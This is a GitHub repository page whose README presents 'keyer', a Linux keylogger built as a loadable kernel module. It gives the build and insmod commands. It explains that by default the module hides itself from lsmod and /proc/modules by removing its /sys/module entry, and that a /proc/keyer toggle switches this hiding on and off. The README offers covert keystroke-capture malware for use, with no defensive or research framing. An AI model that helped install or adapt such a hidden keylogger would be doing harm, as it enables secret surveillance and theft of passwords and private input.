Skip to content

faineance/keyer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Keyer

A simple linux keylogger using a loadable kernel module.

Installation

You need to install the linux kernel headers for your kernel before you begin.

$ make
$ sudo insmod keyer.ko

Check if module is running:

$ dmesg | tail 

Functions

By default it module entry is removed from /sys/module so it cannot be detected by lsmod and /proc/modules. To toggle hidden status:

$ cat /proc/keyer

Removal

Make sure it is not hidden:

$ lsmod | grep keyer

If above command returns nothing, toggle hidden status.

$ cat /proc/keyer

And then remove:

$ sudo rmmod keyer.ko

About

A simple linux kernel keylogger

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors